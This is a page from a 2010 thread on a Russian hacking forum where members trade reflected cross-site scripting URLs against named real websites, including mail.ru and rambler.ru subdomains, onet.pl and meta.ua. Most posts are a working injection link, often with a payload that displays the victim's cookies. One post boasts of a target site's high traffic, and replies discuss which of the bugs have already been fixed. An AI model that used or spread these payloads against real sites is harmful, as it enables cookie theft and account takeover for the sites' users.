HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 17 из 25 « Первая < 7 13 14 15 16 17 18 19 20 21 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #161  
Старый 22.11.2010, 22:38
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию
Цитата:
Сообщение от ~d0s~  
~d0s~ said:
realty.
mail.ru
Код:
Code:
http://realty.mail.ru/detail/001667605.html
Добавляем в куки имя search_res а значение ставим ">alert(123)
Обновляем страничку,любуемся аллертом
Цитата:
Сообщение от satana666  
satana666 said:
В поле "Электронная почта"
">alert(document.cookie)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//avito.ru.msn.com/additem[/COLOR][/COLOR] 
ребят я конечно репу подниму, но скажу что такие уязвимости- бесполезны: цель ксс- атаки- выполнение произвольного кода на стороне клиента жертвы и как-бы просить его подправить куки, либо вписать в поле емайла наш ядовитый код- как-то не по феншую....

P.S. To satana666 - правильное исправление поста, второй ссылкой уже можно добиться результата
 
Ответить с цитированием

  #162  
Старый 23.11.2010, 21:00
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
cards.rambler.ru

Код:
Code:
http://cards.rambler.ru/author.html?author=d0s&offset=1">alert('true')
 
Ответить с цитированием

  #163  
Старый 30.11.2010, 17:49
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
Код HTML:
HTML:
http://szukaj.onet.pl/query.html?qt=777&lr=Polska">alert(document.cookie)
 
Ответить с цитированием

  #164  
Старый 01.12.2010, 19:44
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию
http://wap.ks.korrespondent.net/search.php?keyword=>alert('Speciall y for the Antichat')

Цитата:
Сообщение от None  
ТИЦ 7200 PR 7
Посещаемость очень высокая.
 
Ответить с цитированием

  #165  
Старый 06.12.2010, 03:09
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
job.gala.net

Код:
Code:
http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')
 
Ответить с цитированием

  #166  
Старый 09.12.2010, 17:51
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
meta.ua

Код:
Code:
http://meta.ua/feeds/weather.asp?city=alert(document.cookie)
Вчера там была и в поиске,не успел выложить,сегодня прихожу уже не работает,значит большая вероятность что и эту пофиксят скоро
 
Ответить с цитированием

  #167  
Старый 12.12.2010, 01:50
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
game.km.ru

Код:
Code:
http://game.km.ru/magazin/lenta.asp?idRubr=1&order=">alert('d0s')&search=xD
 
Ответить с цитированием

  #168  
Старый 13.12.2010, 15:35
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
wap.afisha.mail.ru

Код:
Code:
http://wap.afisha.mail.ru/event.html/">alert(document.cookie)
upd:Кто-то слил им

На днях еще на мейле выложу несколько.
 
Ответить с цитированием

  #169  
Старый 15.12.2010, 19:42
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
wap.rambler.ru

Код:
Code:
http://wap.rambler.ru/geo/?back=">alert(123)
 
Ответить с цитированием

  #170  
Старый 15.12.2010, 20:09
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
Цитата:
Сообщение от ~d0s~  
~d0s~ said:
wap.afisha.
mail.ru
Код:
Code:
http://wap.afisha.mail.ru/event.html/">alert(document.cookie)
upd:Кто-то слил им
На днях еще на мейле выложу несколько.
Все баги быстро закрывают из-за того, что сотрудника майла отслеживают такие темы.
 
Ответить с цитированием
Ответ
Страница 17 из 25 « Первая < 7 13 14 15 16 17 18 19 20 21 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ